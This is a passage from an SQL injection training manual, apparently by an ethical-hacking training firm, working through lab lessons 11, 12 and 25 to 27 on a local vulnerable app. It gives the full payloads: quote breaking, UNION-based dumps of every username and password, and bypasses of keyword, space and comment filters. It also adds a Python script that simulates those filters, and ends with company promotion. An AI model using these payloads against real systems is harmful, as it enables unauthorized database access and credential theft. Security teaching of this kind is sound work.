not a real user we don't know the correct username and password, but as hackers we always
wish to get inside the database with the help of SQL injection. Therefore, first we will test whether the
database is vulnerable to SQL injection or not.
Since the lesson itself sounds like an error-based single-quote (') string injection, I used a single quote (') to
break the query inside the username text field, then clicked on submit.
Username: '
From the given screenshot you can see we have got an error message (in blue), which means
the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message
says:

... for the right syntax to use near '' and password='' LIMIT 0,1'

The injected quote closed the username string early, so the rest of the original query is left dangling.
We fix this with a # (hash) comment: after the single quote (') add a hash (#) so that everything after
it is ignored and the query becomes syntactically correct again.

Username: ' #

From the screenshot, you can see it shows "login attempt failed", although we have successfully fixed
the blue error message.

Now whatever statement you insert between ' and # will execute successfully and produce a result
according to it. To find out the number of columns used in the backend query we'll use the ORDER BY
clause, increasing the column number until the database complains:

Username: ' order by 1 #
Username: ' order by 2 #
Username: ' order by 3 #

From the screenshot, you can see I received an error at order by 3, which means there are only two
columns used in the backend query.

Similarly, insert a UNION SELECT between ' and # with the same two columns:

Username: ' union select 1,2 #

From the screenshot, you can see it shows "successfully logged in"; now let's retrieve data from the
database.

The next query will fetch the database name, just as in lesson 1. From the screenshot you can read
the database name "security".

Username: ' union select 1,database() #

Through the query given below, we will be able to fetch the table names present inside the database.

Username: ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users

Now we'll find the column names of the users table using the following query:

Username: ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read every username and password inside the table users:

Username: ' union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials;
now use them to log in.

In some scenarios you will try a single-quote string to test for SQL injection, or go further and try to
break the query even after knowing the database is vulnerable, but you will not be able to break the
query and receive an error message, because the developer may have blacklisted single quotes (') in the
backend query, or the value may simply not be delimited by single quotes.

Lesson 12 is similar to the previous lesson 11, but here you will fail if you use single quotes to break
the query, since this lesson is a POST error-based double-quote (") string injection. Thus I used a
double quote (") to break the query inside the username field and then clicked submit.

Username: "

From the given screenshot you can see we have got the error message (in blue), which means the query
is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message
says:

... for the right syntax to use near '"") and password=("") LIMIT 0,1'

This tells us the username value is wrapped in double quotes and parentheses. So we need to fix the
query with a ) closing parenthesis and a # (hash) comment: after the double quote (") add the closing
parenthesis and then the hash (#) to make it syntactically correct.

Username: ") #

From the screenshot, you can see it shows "login attempt failed", although we have successfully fixed
the blue error message.

Now whatever statement you insert between ") and # will execute successfully and produce a result
according to it. To find out the number of columns used in the backend query we'll use the ORDER BY
clause again:

Username: ") order by 3 #

From the screenshot, you can see I received an error at order by 3, which means there are only two
columns used in the backend query.

Similarly, insert a UNION SELECT between ") and # with the same two columns:

Username: ") union select 1,2 #

From the screenshot, you can see it shows "successfully logged in"; let's now retrieve data from the
database.

The next query will fetch the database name, just as in lesson 1. From the screenshot you can read
the database name "security".

Username: ") union select 1,database() #

Through the query given below, we will be able to fetch the table names present inside the database.

Username: ") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users

Now we'll find the column names of the users table using the following query:

Username: ") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read every username and password inside the table users:

Username: ") union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials;
now use them to log in.

Bypass SQL Injection Filter Manually

In this lab (Less-25) the OR and AND keywords are blocked; we will try to bypass the SQL filter using
their substitutes. The filter applied to the id parameter is:

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);   // strip out OR (case-insensitive)
    $id = preg_replace('/AND/i', "", $id);  // strip out AND (case-insensitive)
    return $id;
}

Since the alphabetic words OR and AND are blacklisted, AND 1=1 or OR 1=1 would be stripped and produce
no output; therefore I used && (URL-encoded as %26%26, because a bare & would be read as a parameter
separator) inside the query. Note that the filter removes the substring "or" wherever it appears,
case-insensitively, so words such as order, password and information are mangled as well. The following
are replacements for AND and OR:

AND : && (URL-encoded as %26%26)
OR : ||
Open the browser and type the following SQL query in the URL:

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From the screenshot, you can see we have successfully fixed the query by writing AND as && (URL-encoded
as %26%26), even though the AND operator was filtered out.

Once the concept of bypassing the AND filter is clear, we alter the SQL statement to retrieve database
information:

http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Type the following query to retrieve the database name using union injection:

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

Hence you can see we have successfully got security as the database name.

The next query will return all the table names saved inside the database. Note the spelling
infoorrmation_schema: the filter strips the "or" in the middle, so information_schema is what reaches
the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 --+

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find out column names of users table using the following query.
http://localhost:81/sqli/Less-25/?id=-
1' union select
1,group_concat(column_name),3 from
infoorrmation_schema.columns where
table_name='users' %26%26 1=1 --+

Hence you can see it contains three columns:

C1: id
C2: username
C3: password

At last, execute the following query to read every username inside the table users. (The column name
password itself contains "or", so selecting it directly would be rewritten to passwd by the filter; it
would need the same doubling trick as infoorrmation_schema, i.e. passwoorrd.)

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From the screenshot, you can read the fetched data.

In the next lab (Less-26) spaces, comments, OR and AND are blocked, so we will again try to bypass the
SQL filter using their substitutes. The filter function is:

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);        // strip out OR (case-insensitive)
    $id = preg_replace('/and/i', "", $id);       // strip out AND (case-insensitive)
    $id = preg_replace('/[\/\*]/', "", $id);     // strip out /*
    $id = preg_replace('/[--]/', "", $id);       // strip out --
    $id = preg_replace('/[#]/', "", $id);        // strip out #
    $id = preg_replace('/[\s]/', "", $id);       // strip out whitespace
    $id = preg_replace('/[\/\\\\]/', "", $id);   // strip out slashes
    return $id;
}
This lab has more filters than lab 25 because spaces and comments are also blocked. Now execute the
following query in the URL:

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From the screenshot you can see we have successfully fixed the query by URL-encoding the space as %a0.
The filter's [\s] only removes ASCII whitespace, while MySQL's parser still treats the 0xA0 byte as a
separator, so the keywords stay apart when the query is executed. Because comment sequences are stripped
too, the payload cannot end with --+ or #; instead it ends in '1=1 so that the application's own closing
quote is consumed and the query becomes id='1'&&'1=1' LIMIT 0,1. Other blanks MySQL accepts in place
of a space are listed below; most of them are ASCII whitespace that this lab's [\s] would also strip,
so %a0 is the one that survives here:
Blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%a0')

Once the concept of bypassing the AND, OR and SPACE filters is clear, we alter the SQL statement to
retrieve database information:

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Type the following query to retrieve the database name using union injection:

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully got security as the database name.

The next query will return all the table names saved inside the database:

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find out column names of users table using the following query.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,group_concat(co
lumn_name),3%a0from%a0infoorrmation_schema.col
umns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see the columns inside it:

C1: id
C2: username
C3: password

At last, execute the following query to read every username inside the table users:

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

From the screenshot, you can read the fetched data.

Hence, we have learned how to bypass the AND, OR, SPACE and COMMENT filters for retrieving
information from the database.

You will find this lab (Less-27) even more challenging because here UNION/union, SELECT/select, SPACE
and comments are blocked, so we will try to bypass the SQL filter using their substitutes. The filter
function is:

function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);   // strip out /*
    $id = preg_replace('/[--]/', "", $id);     // strip out --
    $id = preg_replace('/[#]/', "", $id);      // strip out #
    $id = preg_replace('/[ +]/', "", $id);     // strip out spaces and +
    $id = preg_replace('/select/m', "", $id);  // strip out select
    $id = preg_replace('/[ +]/', "", $id);     // strip out spaces and + (again)
    $id = preg_replace('/union/s', "", $id);   // strip out union
    $id = preg_replace('/select/s', "", $id);  // strip out select
    $id = preg_replace('/UNION/s', "", $id);   // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);  // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);   // strip out Union
    $id = preg_replace('/Select/s', "", $id);  // strip out Select
    return $id;
}

This lab has more filters than lab 26 because union and select are blocked in addition to spaces and
comments; OR and AND, on the other hand, are not filtered here. Unlike lab 25, the keyword patterns
carry no /i modifier, so only the exact spellings listed are removed and a mixed-case spelling such as
UnIon passes straight through. Now execute the following query in the URL:

http://localhost:81/sqli/Less-27/?id=1' AND'1=1

Once the concept of bypassing the UNION/union, SELECT/select and SPACE filters is clear, we alter the
SQL statement to retrieve database information:

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

In the screenshot, you can see I have written union as UnIon and select as SeLect in the query to
bypass the filter.

Now type the following query to retrieve the database name using union injection:

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully got security as the database name.

The next query will return all the table names saved inside the database:

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we'll find the column names of the users table using the following query:

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see the columns inside it:

C1: id
C2: username
C3: password

At last, execute the following query to read every username inside the table users. It keeps the same
shape as the lab 26 query: a WHERE 1 is included so that the trailing AND'1=1 attaches to a valid clause.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(username),3%a0from%a0users%a0where%a01%a0AND'1=1

From the screenshot, you can read the fetched data.

Hence, we have learned how to bypass the UNION/union, SELECT/select, SPACE and COMMENT filters for
retrieving information from the database.
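The three filters in labs 25, 26 and 27 are easiest to reason about by running them. The following is an added example, not code from this manual or from the SQLi lab: a Python re-implementation of the three blacklist() functions (an assumed equivalent of the PHP: preg_replace without the u modifier is byte-oriented, so re.ASCII is used to keep \s from matching U+00A0), plus a helper that URL-decodes an id= value the way PHP's $_GET does, so you can see exactly which characters reach the SQL string. It shows the infoorrmation_schema and passwoorrd doubling for lab 25, that %a0 survives the lab 26 whitespace filter while a normal space does not, and that lab 27 guts a lower-case union select but passes UnIon SeLect untouched. Whether MySQL then accepts the 0xA0 byte as a separator is a property of the server and is not exercised here.

```python
import re
from urllib.parse import unquote_plus

# PHP's preg_replace without the "u" modifier is byte-oriented and PCRE's \s then
# covers only ASCII whitespace; re.ASCII gives Python's \s the same behaviour.
FLAGS = re.ASCII


def blacklist_25(s):
    """Lab 25: strip every "or" and "and", case-insensitively (assumed equivalent)."""
    s = re.sub(r"or", "", s, flags=re.I | FLAGS)
    s = re.sub(r"and", "", s, flags=re.I | FLAGS)
    return s


def blacklist_26(s):
    """Lab 26: lab 25 plus comment characters, whitespace and slashes."""
    s = blacklist_25(s)
    s = re.sub(r"[/*]", "", s, flags=FLAGS)    # /*
    s = re.sub(r"[-]", "", s, flags=FLAGS)     # -- (a character class: every '-' goes)
    s = re.sub(r"[#]", "", s, flags=FLAGS)     # #
    s = re.sub(r"[\s]", "", s, flags=FLAGS)    # ASCII whitespace only: U+00A0 survives
    s = re.sub(r"[/\\]", "", s, flags=FLAGS)   # slashes
    return s


def blacklist_27(s):
    """Lab 27: comments, space/plus, and six exact-case spellings of union/select."""
    s = re.sub(r"[/*]", "", s, flags=FLAGS)
    s = re.sub(r"[-]", "", s, flags=FLAGS)
    s = re.sub(r"[#]", "", s, flags=FLAGS)
    s = re.sub(r"[ +]", "", s, flags=FLAGS)    # space and literal '+'
    for word in ("select", "union", "UNION", "SELECT", "Union", "Select"):
        s = s.replace(word, "")                # no /i modifier, so case matters
    return s


def reaches_sql(filter_fn, url_payload):
    """Decode the id= value as PHP's $_GET would (%a0 -> U+00A0, + -> space),
    then run the lab's filter; the result is what gets spliced into the query."""
    decoded = unquote_plus(url_payload, encoding="latin-1")
    return filter_fn(decoded)


if __name__ == "__main__":
    print(blacklist_25("password"), blacklist_25("passwoorrd"))
    print(repr(reaches_sql(blacklist_26, "1'%a0%26%26'1=1")))
    print(repr(reaches_sql(blacklist_26, "1' %26%26 1=1 --+")))
    print(repr(reaches_sql(blacklist_27, "0'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1")))
    print(repr(reaches_sql(blacklist_27, "0' union select 1,2,3 --+")))
```

Paste any of the lab URLs' id= values into reaches_sql with the matching filter to see what the database would actually receive; a payload that comes back intact is one the filter cannot stop.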

About Us
"Simple training makes Deep Learning"

"IGNITE" is a worldwide name in the IT field. We provide high-quality cybersecurity training and
consulting services that fulfil the requirements of students, government and corporations.
We are working towards the vision to "Develop India as a Cyber Secured Country". With an outreach
to over eighty thousand students and over a thousand major colleges, Ignite Technologies has become
a trusted brand in education and information security.

We provide training and education in the field of Ethical Hacking & Information Security to the
students of schools and colleges along with the corporate world. The training can be provided at the
client's location or at Ignite's Training Center.
We have trained over 10,000 individuals across the globe, ranging from students to security experts
from different fields. Our trainers are acknowledged as Security Researchers by top companies such as
Facebook, Google, Microsoft, Adobe, Nokia, Paypal, Blackberry, AT&T and many more, and our trained
students have been placed in a number of top MNCs all around the globe. On top of this, we have
international experience of training more than 400 individuals.

The two brands, Ignite Technologies & Hacking Articles, have been working together for the past
10+ years with more than 100 security researchers, who themselves have been recognized by
several research paper publishing organizations, the Big 4 companies, bug bounty programs
and many more.

Along with all this, all the major certification organizations recommend Ignite's training for its
resources and guidance.
Ignite's research has been a part of a number of global institutes and colleges, and a multitude of
research papers cite Ignite's researchers in their references.
